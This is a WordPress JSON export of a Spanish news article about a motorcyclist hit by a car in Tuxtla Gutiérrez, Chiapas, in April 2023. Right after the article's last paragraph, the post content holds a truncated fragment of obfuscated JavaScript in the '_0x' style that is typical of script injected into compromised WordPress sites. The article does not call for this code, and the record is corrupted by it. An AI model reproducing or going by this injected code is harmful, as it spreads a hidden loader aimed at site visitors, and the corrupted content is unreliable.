{"id":9732,"date":"2023-04-26T01:18:19","date_gmt":"2023-04-26T01:18:19","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9732"},"modified":"2023-04-26T01:18:19","modified_gmt":"2023-04-26T01:18:19","slug":"motociclista-resulta-herido-luego-de-ser-impactado-por-vehiculo","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9732","title":{"rendered":"Motociclista resulta herido luego de ser impactado por veh\u00edculo"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471804264-576x1024.jpg\" alt=\"\" class=\"wp-image-9733\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471804264-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471804264-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/04\/FB_IMG_1682471804264.jpg 720w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 25 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un motociclista result\u00f3 herido luego de ser impactado por un veh\u00edculo cuando circulaba en el Libramiento Norte Oriente de Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>Los reportes oficiales informaron que, el joven de 23 a\u00f1os circulaba en el carril de Sur a Norte en la Calzada al Sumidero y al llegar a la intersecci\u00f3n fue impactado en el costado por el coche.<\/p>\n\n\n\n<p>Por el impacto sali\u00f3 volando y se estrell\u00f3 contra el pavimento, por lo que fue auxiliado por otros motociclistas que llamaron a los n\u00fameros de emergencias.<\/p>\n\n\n\n<p>El responsable se supo se estacion\u00f3 metros de donde ocurri\u00f3 el percance, frente a una farmacia, para dialogar por los gastos que presuntamente ocasion\u00f3.<\/p>\n\n\n\n<p>Afortunadamente el motociclista no present\u00f3 heridas de gravedad por lo que no fue trasladado a un nosocomio y se retir\u00f3 por sus propios medios.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 25 de abril del 2023. Tuxtla Guti\u00e9rrez.- Un motociclista result\u00f3 herido luego de ser impactado por un veh\u00edculo cuando circulaba en el Libramiento Norte Oriente de Tuxtla Guti\u00e9rrez. Los reportes oficiales informaron que, el joven de 23 a\u00f1os circulaba en el carril de Sur a Norte en la Calzada al Sumidero &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9733,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9732","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9732","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9732"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9732\/revisions"}],"predecessor-version":[{"id":9734,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9732\/revisions\/9734"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9733"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9732"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9732"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9732"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}